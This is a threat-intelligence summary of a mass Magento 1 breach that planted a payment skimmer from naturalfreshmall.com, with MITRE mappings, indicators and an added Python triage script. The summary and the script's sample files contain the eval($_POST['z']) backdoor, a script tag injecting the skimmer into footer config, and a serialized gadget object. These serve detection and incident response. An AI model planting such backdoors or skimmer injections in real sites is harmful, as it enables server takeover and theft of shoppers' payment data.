Sansec tracked a mass Magento 1 compromise affecting hundreds of stores, with about 374 stores infected in a single day as part of a broader breach impacting 500+ shops. Attackers loaded a payment skimmer from naturalfreshmall.com and left numerous backdoors and modified files to maintain access; the operation leveraged a combination of public-facing application exploits and server-side code execution. Hashtags: #Naturalfreshmall #Magento1 #Sansec #Zend_Memory_Manager #POI #SQLi
Keypoints
- Mass Magento 1 breach: hundreds of ecommerce stores were compromised in a short period, with thousands of attempts observed across the ecosystem.
- Attack chain: attackers used a combination of an SQL injection (SQLi) and PHP Object Injection (POI) to gain control of Magento stores.
- POI abuse via Quickview: a vulnerability in the Quickview plugin was exploited for PHP Object Injection, letting the attacker run code on the server; one use of it was to add a validation rule to a Magento table that later served as the backdoor's entry point.
- Backdoor creation and persistence: the attack ended up leaving at least 19 backdoors on infected systems, including various api_*.php files and other modified components.
- New customer flow trigger: the planted validation rule is passed through unserialize() whenever a new customer signs up, so a simple account registration triggers the object injection and executes the attacker's code, which drops a backdoor for remote control.
- Payment skimmer and data interception: the actual payment interception code was added to Magento's core_config_data table under the design/footer configuration, loading from naturalfreshmall.com to skim payment data.
MITRE Techniques
- [T1190] Exploit Public-Facing Application: Attackers used a combination of an SQL injection (SQLi) and PHP Object Injection (POI) to gain control of the Magento store. ["clever combination of an SQL injection (SQLi) and PHP Object Injection (POI) attack to gain control of the Magento store."]
- [T1136.001] Create Account: Local Account: The Quickview vulnerability is typically used to inject rogue Magento admin users; in this case the flaw was used to run code directly on the server instead. ["While this is typically abused to inject rogue Magento admin users, in this case the attacker used the flaw to run code directly on the server."]
- [T1059] Command and Scripting Interpreter: The attacker generated a PHP backdoor file (api_1.php) containing eval($_POST['z']), which executes arbitrary PHP supplied in a POST parameter. (ATT&CK has no PHP sub-technique; the parent technique is the correct mapping.) ["create a file called api_1.php with a simple backdoor eval($_POST['z'])."]
Indicators of Compromise
- [Domain] naturalfreshmall.com: Hosts the skimmer and related payloads (e.g., image/pixel.js); repeatedly referenced as the source of the malicious code loaded into infected stores.
- [File] api_1.php: Backdoor file created on infected systems to accept remote commands via eval() over a POST parameter.
- [File] api.php: Additional backdoor file listed among the malicious or modified components.
- [IP] 132.255.135.230: IP address implicated in the attack.
- [IP] 138.36.92.216: IP address implicated in the attack.
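The following Python script is an added triage example for responders working through the attack chain and the indicators above; it is not Sansec's tooling and is not code from the write-up. It checks a Magento document root for api_*.php files and eval() over request parameters (the backdoor shape quoted in the report), scans a database dump for the skimmer domain and for serialized PHP objects planted where Magento 1 only expects serialized arrays (customer_eav_attribute validation rules, which are the unserialize() trigger on customer signup, and design/footer configuration), and scans access logs for the two IOC addresses. The validate_rules column name, the design/footer/absolute_footer config path, the class name Some_Gadget and all sample files, dump lines and log lines are constructed assumptions for the dry run, not evidence from the page.

```python
"""Triage helpers for the naturalfreshmall.com Magento 1 campaign.

Added example, not Sansec's code. Sample data below is constructed.
"""
import re
import tempfile
from pathlib import Path

IOC_DOMAINS = ("naturalfreshmall.com",)
IOC_IPS = {"132.255.135.230", "138.36.92.216"}

# Backdoor names seen in the campaign; eval() over a request parameter is the
# payload shape quoted in the report (eval($_POST['z'])).
BACKDOOR_NAME = re.compile(r"^api(_\d+)?\.php$")
EVAL_REQUEST = re.compile(r"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\s*\[", re.I)
# A serialized PHP *object*: O:<len>:"<class>":<n>:{...}. Magento 1 legitimately
# stores serialized *arrays* (a:...) in validate_rules; an object there means
# unserialize() will instantiate an attacker-chosen class during signup.
SERIALIZED_OBJECT = re.compile(r'O:\d+:"[A-Za-z0-9_\\]+":\d+:\{')
# Only flag objects in the places this campaign abused (assumed column/path names).
DUMP_CONTEXT = re.compile(r"customer_eav_attribute|validate_rules|design/footer", re.I)


def scan_webroot(root):
    """Return sorted [(relative_path, [reasons])] for suspicious PHP files."""
    root = Path(root)
    findings = []
    for path in root.rglob("*.php"):
        reasons = []
        if BACKDOOR_NAME.match(path.name):
            reasons.append("api_*.php backdoor filename")
        text = path.read_text(encoding="utf-8", errors="replace")
        if EVAL_REQUEST.search(text):
            reasons.append("eval() over request parameter")
        if reasons:
            findings.append((path.relative_to(root).as_posix(), reasons))
    return sorted(findings)


def scan_sql_dump(lines):
    """Return [(line_no, reason)] for dump lines (mysqldump or SELECT output)."""
    hits = []
    for no, line in enumerate(lines, 1):
        if any(d in line.lower() for d in IOC_DOMAINS):
            hits.append((no, "skimmer domain"))
        if SERIALIZED_OBJECT.search(line) and DUMP_CONTEXT.search(line):
            hits.append((no, "serialized object in validation rule / footer config"))
    return hits


def scan_access_log(lines):
    """Return [(line_no, ip)] for requests whose client IP is an IOC address."""
    return [(no, line.split(" ", 1)[0]) for no, line in enumerate(lines, 1)
            if line.split(" ", 1)[0] in IOC_IPS]


def make_sample_webroot(root):
    """Write a constructed mini document root: one clean file, two backdoors."""
    root = Path(root)
    (root / "index.php").write_text("<?php require 'app/Mage.php'; Mage::run();\n")
    (root / "api_1.php").write_text("<?php eval($_POST['z']);\n")  # shape from the report
    (root / "skin").mkdir(exist_ok=True)
    (root / "skin" / "api.php").write_text("<?php @eval($_REQUEST['cmd']);\n")
    return root


# Constructed sample dump: benign footer text, the injected footer script,
# a legitimate serialized array rule, and an injected serialized object.
SAMPLE_DUMP = [
    "UPDATE core_config_data SET value = '&copy; 2022 Example Store' "
    "WHERE path = 'design/footer/copyright';",
    "UPDATE core_config_data SET value = "
    "'<script src=\"https://naturalfreshmall.com/image/pixel.js\"></script>' "
    "WHERE path = 'design/footer/absolute_footer';",
    "UPDATE customer_eav_attribute SET validate_rules = "
    "'a:2:{s:15:\"min_text_length\";i:1;s:15:\"max_text_length\";i:255;}' WHERE attribute_id = 5;",
    "UPDATE customer_eav_attribute SET validate_rules = "
    "'O:11:\"Some_Gadget\":1:{s:4:\"data\";s:7:\"payload\";}' WHERE attribute_id = 7;",
]

# Constructed access log lines (combined log format).
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Feb/2022:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '138.36.92.216 - - [03/Feb/2022:10:00:07 +0000] "POST /api_1.php HTTP/1.1" 200 12',
]


def demo():
    """Run all three scans over the constructed samples and return the results."""
    with tempfile.TemporaryDirectory() as tmp:
        webroot = scan_webroot(make_sample_webroot(tmp))
    return {"webroot": webroot,
            "dump": scan_sql_dump(SAMPLE_DUMP),
            "log": scan_access_log(SAMPLE_LOG)}


if __name__ == "__main__":
    for section, hits in demo().items():
        print(section, hits)
```

On a real engagement point scan_webroot at the Magento root and feed scan_sql_dump a mysqldump of core_config_data and customer_eav_attribute; the serialized-object check is a heuristic for these two tables only, so review any hit by hand rather than treating every "O:" string in the whole database as malicious.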
Read more: https://sansec.io/research/naturalfreshmall-mass-hack